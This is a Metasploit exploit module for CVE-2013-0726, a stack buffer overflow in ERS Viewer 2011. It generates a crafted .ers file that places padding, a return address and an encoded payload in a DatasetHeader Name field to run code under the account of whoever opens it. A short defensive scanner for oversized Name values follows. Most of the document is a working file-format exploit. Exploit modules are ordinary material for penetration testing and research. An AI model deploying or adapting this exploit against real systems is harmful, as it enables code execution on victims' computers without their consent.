##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ERS Viewer 2011 ERS File Handling Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
        (version 11.04). The vulnerability exists in the module ermapper_u.dll where the
        function ERM_convert_to_correct_webpath handles user provided data in an insecure
        way. It results in arbitrary code execution under the context of the user viewing
        a specially crafted .ers file. This module has been tested successfully with ERS
        Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Parvez Anwar', # Vulnerability Discovery
          'juan vazquez'  # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0726' ],
          [ 'OSVDB', '92694' ],
          [ 'BID', '59379' ],
          [ 'URL', 'http://secunia.com/advisories/51725/' ]
        ],
      'Payload'        =>
        {
          'Space'       => 7516,
          'BadChars'    => "\x22\x5c" + (0x7f..0xff).to_a.pack("C*") + (0x00..0x08).to_a.pack("C*") + (0x0a..0x1f).to_a.pack("C*"),
          'DisableNops' => true,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ESP'
            }
        },
      'SaveRegisters'  => [ 'ESP' ],
      'DefaultOptions' =>
        {
          'ExitFunction' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'ERS Viewer 2011 (v11.04)/ Windows XP SP3 / Windows 7 SP1',
            {
              'Offset' => 260,
              'Ret'    => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 23 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']),
      ], self.class)

  end

  # Rewrote it because make_nops is ignoring SaveRegisters
  # and corrupting ESP.
  def make_nops(count)
    return "\x43" * count # 0x43 => inc ebx
  end

  def exploit

    buf = rand_text(target['Offset'])
    buf << [target.ret].pack("V")
    buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode
    buf << payload.encoded

    ers = %Q|
DatasetHeader Begin
Name= "#{buf}"
DatasetHeader End
|

    file_create(ers)
  end
end
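
For triage on the defensive side, the following added example (not part of the Metasploit module or of ERS Viewer) scans the bytes of an .ers file for a `DatasetHeader` `Name` value long enough to reach the 260-byte offset the module targets. The function name `audit_ers`, the `NAME_LIMIT` constant and both sample inputs are constructed for illustration; using the module's `Offset` as the threshold is an assumption.

```ruby
# Added example, not part of the Metasploit module.
# Assumption: the threshold is the module's 'Offset' => 260; a Name value of
# that length or more extends to the saved return address in the target.
NAME_LIMIT = 260

# Scan raw ERS bytes and return one finding per suspicious Name entry
# found inside a DatasetHeader block.
def audit_ers(data)
  data = data.dup.force_encoding(Encoding::BINARY)
  findings = []
  in_header = false
  data.each_line.with_index(1) do |line, lineno|
    text = line.strip
    if text =~ /\ADatasetHeader\s+Begin\z/i
      in_header = true
    elsif text =~ /\ADatasetHeader\s+End\z/i
      in_header = false
    end
    next unless in_header

    # Tolerate a missing closing quote: capture up to the next quote or EOL.
    m = text.match(/\AName\s*=\s*"?([^"]*)/i)
    next unless m

    value = m[1]
    reasons = []
    reasons << "length #{value.bytesize} >= #{NAME_LIMIT}" if value.bytesize >= NAME_LIMIT
    reasons << "non-printable bytes" if value =~ /[^\x20-\x7e]/n
    next if reasons.empty?
    findings << { line: lineno, length: value.bytesize, reasons: reasons }
  end
  findings
end

# Constructed samples (not real datasets).
BENIGN    = %Q(DatasetHeader Begin\n\tName = "scene_01"\nDatasetHeader End\n)
OVERSIZED = %Q(DatasetHeader Begin\n\tName = "#{'A' * 300}"\nDatasetHeader End\n)

if __FILE__ == $0
  { 'benign' => BENIGN, 'oversized' => OVERSIZED }.each do |label, sample|
    puts "#{label}: #{audit_ers(sample).inspect}"
  end
end
```
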